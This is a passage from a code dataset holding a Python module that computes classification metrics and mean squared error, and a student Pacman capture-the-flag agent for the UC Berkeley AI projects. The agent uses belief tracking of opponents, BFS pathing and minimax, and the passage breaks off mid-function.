+{"seq_id":"151032327","text":"\"\"\"\nContains the fscore and MSE functions for evaluation\n\"\"\"\n\ndef f_score(guesses): #list of tuples [(actual, guess),(actual,guess)]\n    confusion = {} #confusion matrix\n\n    unique_classes = []\n    for i in guesses:\n        if i[0] not in unique_classes:\n            unique_classes.append(i[0])\n\n    #for each class, initialize the confusion matrix with zeros for that class\n    for class_name in unique_classes:\n        confusion.update({class_name:{'TP':0,'FP':0,'TN':0,'FN':0}})#class_name is the key for each class's confusion matrix\n        #confusion{class:{TP:0,FP:0,TN:0,FN:0}}\n\n    #for each class\n    for class_name in unique_classes:\n        #for each data point guessed in that class\n        for result in guesses: #result[0] is actual class and result[1] is our guess\n            if class_name == result[1] and class_name == result[0]: #guess is accurate with what the class actually was\n                value = 'TP'\n            if class_name == result[1] and class_name != result[0]: #guessed that a record was part of a class and it wasn't\n                value = 'FP'\n            if class_name != result[1] and class_name == result[0]: #guessed that a record was not part of a class and it was\n                value = 'FN'\n            if class_name != result[1] and class_name != result[0]: #guess is accurate that the record did not belong to a class\n                value = 'TN'\n            confusion[class_name][value] += 1 #increment that class's TP/FP/TN/FN count accordingly\n\n    #calculate our class independent accuracy\n    correct = 0\n    total = 0\n    for result in guesses:\n        if(result[0]==result[1]):\n            correct+=1\n        total+=1\n    accuracy = correct/total\n\n\n    num_of_classes = len(confusion)\n\n    count = 0\n    precision = 0\n    recall=0\n    f1=0\n    for class1, matrix in confusion.items():\n        TP = matrix['TP']\n        TN = matrix['TN']\n        FP = matrix['FP']\n        FN = matrix['FN']\n        if((TP+FP) != 0):\n            precision += TP/(TP+FP)\n            ptemp = TP/(TP+FP)\n        else:\n            ptemp = 0\n        if((TP+FN) != 0):\n            recall += TP/(TP+FN)\n            rtemp = TP/(TP+FN)\n        else:\n            rtemp = 0\n        if((ptemp+rtemp)!=0):\n            f1 += 2*ptemp*rtemp/(ptemp+rtemp)\n        count+=1\n    precision = precision/count\n    recall = recall/count\n    f1 = f1/count\n\n    #f1 = 2*precision*recall/(precision+recall)\n\n    metrics = {'F1': f1, 'Precision':precision, 'Recall':recall, 'Accuracy': accuracy}\n    return metrics\n\ndef mse(guesses):\n    error = 0\n    for i in guesses:\n        error += (i[0] - i[1])**2\n    error/=len(guesses)\n    return 
error\n","sub_path":"Assignment_EC/evaluations.py","file_name":"evaluations.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"636652008","text":"# myTeam.py\n# version 2.3 fix bug\n# Time: 10/17/2020 \n# ---------\n# Licensing Information:  You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\nfrom captureAgents import CaptureAgent\nfrom capture import GameState\nimport distanceCalculator\nimport random, time, util\nfrom game import Directions\nimport game\n\n# global variable\nbelief = {}\n\n#################\n# Team creation #\n#################\n\ndef createTeam(firstIndex, secondIndex, isRed,\n               first = 'ClassicPlanAgent', second = 'DefensiveReflexAgent'):\n    \"\"\"\n    This function should return a list of two agents that will form the\n    team, initialized using firstIndex and secondIndex as their agent\n    index numbers. isRed is True if the red team is being created, and\n    will be False if the blue team is being created.\n\n    As a potentially helpful development aid, this function can take\n    additional string-valued keyword arguments (\"first\" and \"second\" are\n    such arguments in the case of this function), which will come from\n    the --redOpts and --blueOpts command-line arguments to capture.py.\n    For the nightly contest, however, your team will be created without\n    any extra arguments, so you should make sure that the default\n    behavior is what you want for the nightly contest.\n    \"\"\"\n\n    # The following line is an example only; feel free to change it.\n    return [eval(first)(firstIndex), eval(second)(secondIndex)]\n\n##########\n# Agents #\n##########\nclass ClassicPlanAgent(CaptureAgent):\n    \"\"\"\n    A Dummy agent to serve as an example of the necessary agent structure.\n    You should look at baselineTeam.py for more details about how to\n    create an agent as this is the bare minimum.\n    \"\"\"\n    def registerInitialState(self, gameState):\n        \"\"\"\n        This method handles the initial setup of the\n        agent to populate useful fields (such as what team\n        we're on).\n        A distanceCalculator instance caches the maze distances\n        between each pair of positions, so your agents can use:\n        self.distancer.getDistance(p1, p2)\n        IMPORTANT: This method may run for at most 15 seconds.\n        \"\"\"\n\n        '''\n        Make sure you do not delete the following line. 
If you would like to\n use Manhattan distances instead of maze distances in order to save\n on initialization time, please take a look at\n CaptureAgent.registerInitialState in captureAgents.py.\n '''\n CaptureAgent.registerInitialState(self, gameState)\n\n '''\n Your initialization code goes here, if you need any.\n '''\n self.enemies = self.getOpponents(gameState)\n\n self.start = gameState.getAgentPosition(self.index)\n \n self.totalFoodNum = len(self.getFood(gameState).asList())\n self.minPelletsToCashIn = int(self.totalFoodNum*0.35)\n\n # Game information\n self.isRed = gameState.isOnRedTeam(self.index)\n self.myFriend = gameState.getRedTeamIndices() if gameState.isOnRedTeam(self.index) else gameState.getBlueTeamIndices()\n self.myFriend.remove(self.index)\n self.myFriend = self.myFriend[0]\n\n # Board information\n self.width = gameState.data.layout.width\n self.height = gameState.data.layout.height\n self.midWidth = self.width/2\n self.midHeight = self.height/2\n\n self.midPointLeft = int((self.width / 2.0)-1)\n self.midPointRight = int((self.width / 2.0)+1)\n\n self.midPoint, self.midPointEnemy, self.enemyCells = self.getBoardInfo(gameState)\n\n self.frontierPoints = [(self.midPoint, int(i)) for i in range(self.height) if not gameState.hasWall(self.midPoint, i)]\n self.frontierPointsEnemy = [(self.midPointEnemy, int(i)) for i in range(self.height) if not gameState.hasWall(self.midPointEnemy, i)]\n\n self.legalPositions = [p for p in gameState.getWalls().asList(False) if p[1] >= 1]\n self.myCells = [c for c in self.legalPositions if c not in self.enemyCells]\n \n # A dictionary for the closest distance from any enemy cell to home\n self.distToHome = self.getDistToHome(self.frontierPoints, self.enemyCells)\n # A sequence of action to the closest enemy cell\n self.frontierState, self.actionFrontier = self.toFrontier(gameState, self.frontierPoints, self.start)\n\n self.closestFrontier = self.frontierState.getAgentPosition(self.index)\n if self.closestFrontier in self.frontierPoints[:int(len(self.frontierPoints)/2)]:\n self.favoredY = 0.0\n else:\n self.favoredY = self.height\n\n # minimax initial set up\n # face 1 enemy depth\n self.miniMaxDepth = 4\n # face 2 enemy depth\n self.miniMaxDepth2 = 3\n # Initialisation for hyper-parameters\n self.epsilon = 0.75\n\n # enemies\n self.enemies = self.getOpponents(gameState)\n global belief # inference on ghost position\n self.trackPosition = {} # track historical positions the enemy has been to\n \n self.findDeadEnd(gameState)\n #print(\"===Find dead end poses=== 145\\n\", \"\\n\",self.deadEndPoses)\n #print(gameState.data.layout)\n fakeLay = gameState.data.layout.deepCopy()\n #print(\"FAKE\\n\",fakeLay)\n maxY = self.height - 1\n newlay = \"\"\n for y in range(self.height):\n for x in range(self.width):\n if (x, maxY - y) in self.deadEndPoses:\n newlay +='X'\n else:\n newlay += fakeLay.layoutText[y][x]\n \n\n #layoutChar = fakeLay.layoutText[maxY - y][x]\n #print(layoutChar)\n newlay += '\\n'\n \"\"\"for (x,y) in self.deadEndPoses:\n fakeLay.layoutText[maxY - y][x] = 'x'\"\"\"\n #print(newlay)\n \n self.findDeadEnd(gameState)\n \n #print(\"===Find dead end poses=== 145\\n\", \"\\n\",self.deadEndPoses)\n #print(gameState.data.layout)\n fakeLay = gameState.data.layout.deepCopy()\n #print(\"FAKE\\n\",fakeLay)\n maxY = self.height - 1\n newlay = \"\"\n for y in range(self.height):\n for x in range(self.width):\n if (x, maxY - y) in self.deadEndPoses:\n newlay +='X'\n else:\n newlay += fakeLay.layoutText[y][x]\n \n\n #layoutChar = 
fakeLay.layoutText[maxY - y][x]\n                    #print(layoutChar)\n            newlay += '\\n'\n        \"\"\"for (x,y) in self.deadEndPoses:\n            fakeLay.layoutText[maxY - y][x] = 'x'\"\"\"\n        #print(newlay)\n        \n        for enemy in self.enemies:\n            belief[enemy] = util.Counter()\n            self.trackPosition[enemy] = []\n            # set our initial belief of the enemies\n            belief[enemy][gameState.getInitialAgentPosition(enemy)] = 1\n            self.trackPosition[enemy] += [gameState.getInitialAgentPosition(enemy)]\n        self.enemyProbPos = util.Counter()\n    def randomWalk(self, enemy, gameState):\n        \"\"\"\n        Update our belief inference of enemy position when they CANNOT BE DETECTED.\n        Generate a distribution based on random walk assumption of the enemies.\n        In each step, all possible transitions are considered.\n        \"\"\"\n        newBelief = util.Counter()\n        global belief\n        for pos in belief[enemy]:\n            newPos = util.Counter()\n            # get possible transition position\n            transitPos = [(pos[0], pos[1] + 1), \n                          (pos[0] - 1, pos[1]), (pos[0], pos[1] ), (pos[0] + 1, pos[1]), # disregard the option of STOP \n                          (pos[0], pos[1] - 1)]\n\n            for tPos in transitPos:\n                if tPos in self.legalPositions:\n                    if (tPos not in self.trackPosition[enemy]): \n\n                        newPos[tPos] += 2 # more overlap means more chance of ending up in this cell\n                        self.trackPosition[enemy] += [tPos]\n\n                    else:\n                        newPos[tPos] += 0.0001 # assume little possibility of going back\n            newPos.normalize()\n            \n            for nPos, prob in newPos.items():\n                # Update the probabilities for each of the positions.\n                newBelief[nPos] += prob * belief[enemy][pos] # transition probability = Pr(oldPos)*Pr(newPos)\n            \n        newBelief.normalize()\n        belief[enemy] = newBelief \n\n    def observedEnemy(self, enemy, gameState):\n        \"\"\"\n        This function updates our belief based on noisy observation and random walk result\n        \"\"\"\n        noisyDist = gameState.getAgentDistances()[enemy]\n        myPos = gameState.getAgentPosition(self.index)\n        defendFoodCurrent = self.getFoodYouAreDefending(gameState).asList()\n        \n        newBelief = util.Counter()\n\n        prevState = self.getPreviousObservation()\n        if prevState:\n            defendFoodPrev = self.getFoodYouAreDefending(prevState).asList()\n            foodEaten = list(set(defendFoodPrev) - set(defendFoodCurrent))\n            enemyState = prevState.getAgentState(enemy)\n            invader = enemyState.isPacman\n\n        global belief\n\n        for legalPos in self.legalPositions:\n            trueDist = self.getMazeDistance(legalPos, myPos)\n            manhattanDist = util.manhattanDistance(myPos, legalPos)\n            # given true distance, probability of noisy distance being true\n            distProb = gameState.getDistanceProb(trueDist, noisyDist)\n            \n            # === eliminate unlikely readings ===\n            if manhattanDist <= 5:\n                newBelief[legalPos] = 0\n            \n            elif abs(trueDist - noisyDist) > 6:\n                newBelief[legalPos] = 0\n\n            else:\n                newBelief[legalPos] += belief[enemy][legalPos] * distProb\n\n            # === adding likely position ===\n            if prevState:\n                if foodEaten: # if there's eaten food, enemy should be around that position now\n                    pos = foodEaten[0]\n                    if invader:\n                        transitPos = [(pos[0], pos[1] + 1), \n                                      (pos[0] - 1, pos[1]), (pos[0], pos[1] ), (pos[0] + 1, pos[1]), # disregard the option of STOP \n                                      (pos[0], pos[1] - 1)]\n                        for tPos in transitPos:\n                            if tPos in self.legalPositions:\n                                newBelief[tPos] += 1\n                                self.trackPosition[enemy] += [tPos]\n\n        if newBelief.totalCount() != 0:\n            newBelief.normalize()\n        belief[enemy] = newBelief\n\n    \n    def getBoardInfo(self, gameState):\n        \"\"\"\n        This function provides information of the mid point of both sides and the enemy grid\n        \"\"\"\n        if self.isRed:\n            midPoint = int(self.midPointLeft)\n            midPointEnemy = int(self.midPointRight)\n            enemyCells = []\n            for i in range(self.midPointRight-1, self.width):\n                for j in range(self.height):\n                    if not gameState.hasWall(i, j):\n                        enemyCells.append((i, j))\n        \n        else:\n            midPoint = int(self.midPointRight)\n            midPointEnemy = int(self.midPointLeft)\n            enemyCells = []\n            for i in range(self.midPointLeft):\n                for j in range(self.height):\n                    if not gameState.hasWall(i, j):\n                        enemyCells.append((int(i), int(j)))\n        return midPoint, midPointEnemy, enemyCells\n\n    def getDistToHome(self, home, possibleLocs):\n        distToHome = util.Counter()\n        for loc in possibleLocs:\n            mindist = 9999\n            for h in home:\n                curDist = (self.getMazeDistance(h, loc))\n                if curDist < mindist:\n                    mindist = curDist\n                    distToHome[loc] = (curDist, h)\n        return distToHome\n\n    def toFrontier(self, gameState, frontierPoints, start):\n        \"\"\"\n        Returns the closest path to home frontier\n        \"\"\"\n        minDist = 9999\n        for point in frontierPoints:\n            currentDist = self.getMazeDistance(point, start)\n            if currentDist < minDist:\n                minDist = currentDist\n                minPosition = point\n        actionSeq = self.getBfsPath(gameState, minPosition, start)\n        return actionSeq\n\n    def getBfsPath(self, gameState, end, start):\n        \"\"\"\n        Helper function for toFrontier\n        Using BFS to search path\n        \"\"\"\n        explored = [start]\n        states = util.Queue()\n        stateRecord = (gameState, [])\n        states.push(stateRecord)\n        cur_pos = start\n        while not states.isEmpty():\n            state, action = states.pop()\n            cur_pos = state.getAgentPosition(self.index)\n\n            if cur_pos == end:\n                return state, action\n            \n            legalActions = state.getLegalActions(self.index)\n\n            for a in legalActions:\n                successor = state.generateSuccessor(self.index, a)\n                coor = successor.getAgentPosition(self.index)\n                if coor not in explored:\n                    explored.append(coor)\n                    states.push((successor, action+[a]))\n        \n    def chooseAction(self, gameState):\n        \"\"\"\n        Picks among actions randomly.\n        \"\"\"\n        actions = gameState.getLegalActions(self.index)\n\n        '''\n        You should change this in your own agent.\n        '''\n        # INIT VARIABLES TO USE\n        gstPos = self.checkStateSafe(gameState)\n        myPos = gameState.getAgentPosition(self.index)\n        Pacman = gameState.getAgentState(self.index).isPacman\n        myState = gameState.getAgentState(self.index)\n        defendFood = self.getFoodYouAreDefending(gameState).asList()\n        timeLeft = gameState.data.timeleft/4 # for debug\n        global belief\n        \n        # Update our belief of enemies position\n        for enemy in self.enemies:\n            enemyPos = gameState.getAgentPosition(enemy)\n            if enemyPos:\n                newBelief = util.Counter()\n                newBelief[enemyPos] = 1\n                belief[enemy] = newBelief\n            \n            else:\n                self.randomWalk(enemy, gameState)\n                self.observedEnemy(enemy, gameState)\n                prevState = self.getPreviousObservation()\n                if prevState:\n                    prevEnemyPos = prevState.getAgentPosition(enemy)\n                    prevMyPos = prevState.getAgentPosition(self.index)\n                    \n                    if prevEnemyPos and (self.getMazeDistance(prevEnemyPos, prevMyPos) == 1) and (prevState.getAgentState(enemy).isPacman):\n                        newBelief = util.Counter()\n                        newBelief[gameState.getInitialAgentPosition(enemy)] = 1\n                        print('enemy pacman busted')\n                        belief[enemy] = newBelief\n                        self.trackPosition[enemy] = []\n\n        # Get most probable position of enemy\n\n        for enemy in self.enemies:\n            maxProb = sorted(belief[enemy].values())[-3:] # choose the top three probable positions\n            probablePosition = [(pos, prob) for pos, prob in belief[enemy].items() if prob in maxProb]\n            self.enemyProbPos[enemy] = probablePosition\n        #print('\\n=== 310 ===', enemyProbPos)\n\n\n        # === ABOUT-TO-LOSE SCENARIO ===\n        # ACTION SCENARIO 7: the enemy ate the Capsule\n        scared = 
gameState.data.agentStates[self.index].scaredTimer\n        enemyPacmanPos = self.checkStateSafeAtHome(gameState)\n        if scared > 0 and enemyPacmanPos and not Pacman:\n            enermyIndex = [tup[0] for tup in enemyPacmanPos]\n            toAct = self.minimax(gameState, self.index, enermyIndex, False)\n            return toAct\n\n        if len(defendFood) <= self.totalFoodNum/5:\n            values = [self.evaluatePatrol(gameState, a) for a in actions]\n            maxValue = max(values)\n            bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n            toAct = random.choice(bestActions)\n            return toAct\n\n        # === NORMAL SCENARIO ===\n        # ACTION STEP 1: reach the frontier first\n        if self.actionFrontier:\n            toAct = self.actionFrontier.pop(0)\n            return toAct\n\n        # ACTION STEP 2: after reaching the frontier\n        # === REACHED-AN-IMPASSE SCENARIO ===\n        isInImpasse = self.reachedImpasse(gameState, myPos)\n        if isInImpasse:\n            values = [self.evaluateImpasse(gameState, a) for a in actions]\n            maxValue = max(values)\n            bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n            bestAction = random.choice(bestActions)\n            return bestAction\n\n        # === DETECTED GHOST === USE MINIMAX ===\n        if gstPos and Pacman:\n            enermyIndex = [tup[0] for tup in gstPos]\n            toAct = self.minimax(gameState, self.index, enermyIndex)\n            return toAct\n\n        # ACTION SCENARIO 6: about to win (checked after ghost detection)\n        foodLeft = len(self.getFood(gameState).asList())\n        if foodLeft <= 2:\n            bestDist = 9999\n            for action in actions:\n                successor = self.getSuccessor(gameState, action)\n                pos2 = successor.getAgentPosition(self.index)\n                dist = self.getMazeDistance(self.start, pos2)\n                if dist < bestDist:\n                    bestAction = action\n                    bestDist = dist\n            return bestAction\n\n        # ACTION SCENARIO 4: if carrying more food than the threshold, cash it in\n        goHome = self.needToCashIn(myPos, myState, self.minPelletsToCashIn, timeLeft)\n        notHome = self.distToHome[myPos]\n        isCloseToFood = self.isCloseToFood(gameState, actions)\n        if goHome and (notHome) and (not isCloseToFood):\n            dist, end = self.distToHome[myPos]\n            # BFS finds the shortest path home\n            _, path = self.getBfsPath(gameState, end, myPos)\n            toAct = path.pop(0)\n\n            # check if threatened by a ghost\n            threatToHome = self.checkStateSafe(gameState)\n            Pacman = gameState.getAgentState(self.index).isPacman\n\n            # escape\n            if threatToHome and Pacman:\n                enermyIndex = [tup[0] for tup in threatToHome]\n                toAct = self.minimax(gameState, self.index, enermyIndex)\n                return toAct\n            return toAct\n\n        # ACTION SCENARIO 5: explore food or capsules\n        values = [self.evaluate(gameState, a) for a in actions]\n        maxValue = max(values)\n        bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n        toAct = random.choice(bestActions)\n        return toAct\n\n    # helper function for findDeadEnd: counts the walls (including filled cells) surrounding a position\n    def 
detectSurroundWallWithFilled(self, gameState, pos, filledPos):\n        wallNum = 0\n        if gameState.hasWall(pos[0] + 1, pos[1]) or (pos[0] + 1, pos[1]) in filledPos:\n            wallNum += 1\n        if gameState.hasWall(pos[0] - 1, pos[1]) or (pos[0] - 1, pos[1]) in filledPos:\n            wallNum += 1\n        if gameState.hasWall(pos[0], pos[1] + 1) or (pos[0], pos[1] + 1) in filledPos:\n            wallNum += 1\n        if gameState.hasWall(pos[0], pos[1] - 1) or (pos[0], pos[1] - 1) in filledPos:\n            wallNum += 1\n        return wallNum\n\n    # Find all dead end positions in the maze\n    def findDeadEnd(self, gameState):\n        deadEndPos = set()\n        posQueue = util.Queue()\n        # seed the search with every cell that is walled in on three sides\n        for x in range(1, self.width - 1):\n            for y in range(1, self.height - 1):\n                if not gameState.hasWall(x, y) and self.detectSurroundWall(gameState, (x, y)) == 3:\n                    deadEndPos.add((x, y))\n                    posQueue.push((x, y))\n        # flood outwards: a cell surrounded by walls or known dead-end cells is also a dead end\n        while not posQueue.isEmpty():\n            curPos = posQueue.pop()\n            neighborPoses = [(curPos[0] + 1, curPos[1]), (curPos[0] - 1, curPos[1]), (curPos[0], curPos[1] + 1), (curPos[0], curPos[1] - 1)]\n            for neighborPos in neighborPoses:\n                if neighborPos not in deadEndPos and not gameState.hasWall(neighborPos[0], neighborPos[1]):\n                    if self.detectSurroundWallWithFilled(gameState, neighborPos, deadEndPos) >= 3:\n                        deadEndPos.add(neighborPos)\n                        posQueue.push(neighborPos)\n        self.deadEndPoses = deadEndPos\n\n    def checkStateSafeAtHome(self, gameState):\n        enemy = self.getEnemy(gameState)\n        enemyPacman = enemy['Pacman']\n        agentPos = gameState.getAgentPosition(self.index)\n        nearbyEnermy = []\n\n        for index, pos in enemyPacman:\n            dist = self.getMazeDistance(agentPos, pos)\n            if dist <= 5:\n                nearbyEnermy.append((index, pos))\n\n        if not nearbyEnermy:\n            return None\n        return nearbyEnermy\n\n    def evaluateGoHome(self, gameState, action):\n        features = self.getFeaturesGoHome(gameState, action)\n        weights = self.getWeightsGoHome(gameState, action)\n        return features * weights\n\n    def getFeaturesGoHome(self, gameState, action):\n        features = util.Counter()\n        myPos = gameState.getAgentPosition(self.index)\n        ghsPosition = self.checkStateSafe(gameState)\n        successor = gameState.generateSuccessor(self.index, action)\n        nextPos = successor.getAgentState(self.index).getPosition()\n        if ghsPosition:\n            for _, pos in ghsPosition:\n                features['distToGhost'] += self.getMazeDistance(pos, nextPos)\n        else:\n            features['distToGhost'] = 0\n        if self.distToHome[myPos]:\n            features['homeDist'] = -1 * self.distToHome[myPos][0]\n        else:\n            features['homeDist'] = 0\n\n        # is Pacman\n        features['isPacman'] = successor.getAgentState(self.index).isPacman\n\n        return features\n\n    def getWeightsGoHome(self, gameState, action):\n        return {'homeDist': 50, 'distToGhost': 10, 'isPacman': -80}\n\n    def reachedImpasse(self, gameState, myPos):\n        inImpasseRegion = bool(myPos in self.frontierPoints)\n        gstPos = self.checkStateSafe(gameState)\n        return inImpasseRegion and gstPos\n\n    def evaluateImpasse(self, gameState, action):\n        features = self.getFeaturesImpasse(gameState, action)\n        weights = self.getWeightsImpasse(gameState, action)\n        return features * weights\n\n    def getFeaturesImpasse(self, gameState, action):\n        features = util.Counter()\n        successor = self.getSuccessor(gameState, action)\n        foodList = self.getFood(successor).asList()\n        
nextPos = successor.getAgentState(self.index).getPosition()\n\n        # Compute distance to the nearest ghost-free (i.e. least belief in ghost position) enemy territory\n        features['distToGstFreeEnemyAreaY'] = self.getDistToGstFreeEnemyAreaY(gameState, nextPos)\n        features['distToGstFreeEnemyAreaX'] = self.getDistToGstFreeEnemyAreaX(gameState, nextPos)\n\n        # Away from ghost\n        ghsPosition = self.checkStateSafe(gameState)\n        if ghsPosition:\n            for enemyIdx, pos in ghsPosition:\n                features['distToGhost'] += self.getMazeDistance(pos, nextPos)\n\n        features['distToGhost'] += self.getApproxGhostDistance(nextPos)\n\n        # if the destination of the action holds a ghost, the next position will be the starting point\n        if nextPos == self.start:\n            features['distToGhost'] = 0\n\n        # penalise stop\n        if action == Directions.STOP: features['stop'] = 1\n\n        # penalise reverse\n        rev = Directions.REVERSE[gameState.getAgentState(self.index).configuration.direction]\n        if action == rev: features['reverse'] = 1\n\n        # invader\n        enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]\n        invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n        if len(invaders) > 0:\n            dists = [self.getMazeDistance(nextPos, a.getPosition()) for a in invaders]\n            features['invaderDistance'] = min(dists)\n\n        # invader number\n        features['numInvaders'] = len(invaders)\n\n        # isPacman\n        features['isPacman'] = successor.getAgentState(self.index).isPacman\n\n        # is eaten\n        if ghsPosition:\n            if self.mayBeEaten(nextPos, ghsPosition) or nextPos == self.start:\n                features['isEaten'] = 1\n        else:\n            features['isEaten'] = 0\n        return features\n\n    def getDistToGstFreeEnemyAreaY(self, gameState, nextPos):\n        \"\"\"\n        Maximise the absolute y-axis distance to the belief of ghost position\n        \"\"\"\n        dist = 0\n        global belief\n        posList = list(belief[self.enemies[0]].items()) + list(belief[self.enemies[1]].items())\n        for pos, prob in posList:\n            if pos in self.enemyCells:\n                dist += prob * abs(pos[1] - nextPos[1])  # maximise y distance\n        return -1 * dist\n\n    def getDistToGstFreeEnemyAreaX(self, gameState, nextPos):\n        \"\"\"\n        Maximise the absolute x-axis distance to the belief of ghost position\n        \"\"\"\n        dist = 0\n        global belief\n        posList = list(belief[self.enemies[0]].items()) + list(belief[self.enemies[1]].items())\n        for pos, prob in posList:\n            if pos in self.enemyCells:\n                dist += prob * abs(pos[0] - nextPos[0])  # maximise x distance\n        return -1 * dist\n\n    def minimax(self, gameState, playerIndex, enermyIndex, isPacman = True):\n        if len(enermyIndex) == 1:\n            allIndexes = [self.index, enermyIndex[0]]\n            depth = self.miniMaxDepth\n            _, toAct = self.max2(gameState, depth, self.index, allIndexes, isPacman)\n        elif len(enermyIndex) == 2:\n            allIndexes = [playerIndex] + enermyIndex\n            depth = self.miniMaxDepth2\n            _, toAct = self.maxn(gameState, depth, playerIndex, allIndexes, isPacman)\n        return toAct\n\n    def getEvaluation(self, gameState, allIndex):\n        if len(allIndex) == 2:\n            myPos = gameState.getAgentPosition(allIndex[0])\n            enermyPos = gameState.getAgentPosition(allIndex[1])\n            value = self.getMazeDistance(myPos, enermyPos)\n            if myPos == self.start:\n                value -= 200\n            return value\n        else:\n            myPos = 
gameState.getAgentPosition(allIndex[0])\n            enermyPos1 = gameState.getAgentPosition(allIndex[1])\n            enermyPos2 = gameState.getAgentPosition(allIndex[2])\n            distToEnermy1 = self.getMazeDistance(myPos, enermyPos1)\n            distToEnermy2 = self.getMazeDistance(myPos, enermyPos2)\n            minDistToEnermy = min(distToEnermy1, distToEnermy2)\n            return [(minDistToEnermy, -distToEnermy1, -distToEnermy2)]\n\n    def getApproxGhostDistance(self, nextPos):\n        dist = 0\n        global belief\n        posList = list(belief[self.enemies[0]].items()) + list(belief[self.enemies[1]].items())\n        for pos, prob in posList:\n            if pos in self.enemyCells:\n                dist += prob * self.getMazeDistance(pos, nextPos)\n        return dist\n\n    def updateBelief(self, position, idx):\n        alreadyExistedPositions = belief[idx].keys()\n        if position in alreadyExistedPositions or (not alreadyExistedPositions):\n            possiblePositions = [(position[0] + i, position[1] + j) for i in [-1, 0, 1] for j in [-1, 0, 1] if (position[0] + i, position[1] + j) in self.legalPositions]\n            for pos in possiblePositions:\n                belief[idx][pos] += 1/9\n            belief[idx][position] += 1/9\n        else:\n            belief[idx] = util.Counter()  # if out of threat, clean our belief\n\n    def getDistToFriend(self, friendPos, myPos):\n        favoredY = self.favoredY\n        friendDist = self.getMazeDistance(myPos, friendPos)\n        if friendDist <= 4:\n            return friendDist + favoredY\n        return favoredY\n\n    def mayBeEaten(self, nextPos, gstPos):\n        beEaten = 0\n        for _, pos in gstPos:\n            gstNextPos = [(pos[0] + i, pos[1] + j) for i in [-1, 0, 1] for j in [-1, 0, 1]]\n            if nextPos in gstNextPos:\n                beEaten = 1\n        return beEaten\n\n    def getWeightsImpasse(self, gameState, action):\n        return {'distToGstFreeEnemyAreaY': -30, 'distToGstFreeEnemyAreaX': -10, 'distToGhost': 40,\n                'stop': -12, 'reverse': -5, 'invaderDistance': -6,\n                'isPacman': -3, 'isEaten': -80}\n\n    def max2(self, gameState, depth, playerIndex, allGameIndexes, isPacman):\n        if depth == 0 or gameState.getLegalActions(playerIndex) == None:\n            return (self.getEvaluation(gameState, allGameIndexes), None)\n        else:\n            actions = gameState.getLegalActions(playerIndex)\n            actionValues = []\n            applicableActions = []\n            myPosList = []\n            for action in actions:\n                # skip the 'Stop' action\n                if action != \"Stop\":\n                    successor = gameState.generateSuccessor(playerIndex, action)\n                    enermyIndex = allGameIndexes[1]\n                    actionValue, a = self.min2(successor, depth - 1, enermyIndex, allGameIndexes, isPacman)\n                    myPos = successor.getAgentPosition(playerIndex)\n                    myPosList.append(myPos)\n                    actionValues.append(actionValue)\n                    applicableActions.append(action)\n\n            # when the final action (depth = self.miniMaxDepth) list is empty, return 'Stop'\n            if len(applicableActions) == 0:\n                return 0, 'Stop'\n\n            maxValue = max(actionValues)\n            bestActions = [a for a, v, p in zip(applicableActions, actionValues, myPosList) if v == maxValue]\n            bestActionsPos = [p for a, v, p in zip(applicableActions, actionValues, myPosList) if v == maxValue]\n\n            if depth != self.miniMaxDepth:\n                return maxValue, random.choice(bestActions)\n\n            # select next action based on features (try to avoid going into a dead end)\n            if depth == self.miniMaxDepth:\n                selectedActions = 
self.selectMiniMaxAction(bestActions, bestActionsPos, gameState, isPacman)\n return 0, random.choice(selectedActions)\n \n # detect the number of walls surround a position.\n def detectSurroundWall(self, gameState, pos):\n wallNum = 0\n if gameState.hasWall(pos[0] + 1, pos[1]):\n wallNum += 1\n if gameState.hasWall(pos[0] - 1, pos[1]):\n wallNum += 1\n if gameState.hasWall(pos[0], pos[1] + 1):\n wallNum += 1\n if gameState.hasWall(pos[0], pos[1] - 1):\n wallNum += 1\n return wallNum\n \n\n \n # Select actions with shortest distance to home from the highest depth \n def selectMiniMaxAction(self, bestActions, bestActionsPos, gameState, isPacman):\n if isPacman:\n selectedActionsAtHome = []\n distToHomeList = []\n selectedActionsInEnermy = []\n actionsInEnermy = []\n actionsInDeadEnd = []\n actionsInDeadEndDist = []\n for bestAction, pos in zip(bestActions, bestActionsPos):\n if pos not in self.enemyCells:\n selectedActionsAtHome.append(bestAction)\n elif pos in self.enemyCells and pos not in self.deadEndPoses:\n distToHomeList.append(self.distToHome[pos][0])\n actionsInEnermy.append(bestAction)\n elif pos in self.enemyCells:\n actionsInDeadEnd.append(bestAction)\n actionsInDeadEndDist.append(self.distToHome[pos][0])\n\n \n if len(distToHomeList) !=0:\n closestToHomeDist = min(distToHomeList)\n selectedActionsInEnermy = [a for a,d in zip(actionsInEnermy, distToHomeList) if d == closestToHomeDist]\n\n selectedActions = selectedActionsAtHome + selectedActionsInEnermy\n elif len(selectedActionsAtHome):\n selectedActions = selectedActionsAtHome \n else:\n closestToHomeDistInDeadEnd = min(actionsInDeadEndDist)\n selectedActionsInEnermyDeadEnd = [a for a,d in zip(actionsInDeadEnd, actionsInDeadEndDist) if d == closestToHomeDistInDeadEnd]\n selectedActions = selectedActionsInEnermyDeadEnd\n if len(selectedActions) != 0:\n #print('407--', random.choice(selectedActions))\n return selectedActions\n #print('408--', random.choice(selectedActions))\n else:\n return bestActions\n else:\n selectedActionsAtHome = []\n distToEnemyHomeList = []\n selectedActionsInEnermy = []\n actionsAtHome = []\n actionsInDeadEnd = []\n actionsInDeadEndDist = []\n for bestAction, pos in zip(bestActions, bestActionsPos):\n if pos in self.enemyCells:\n selectedActionsInEnermy.append(bestAction)\n elif pos not in self.enemyCells and pos not in self.deadEndPoses:\n distToEnemyHomeList.append(self.computeDistToEnemyHome(pos)[0])\n actionsAtHome.append(bestAction)\n elif pos not in self.enemyCells:\n actionsInDeadEnd.append(bestAction)\n 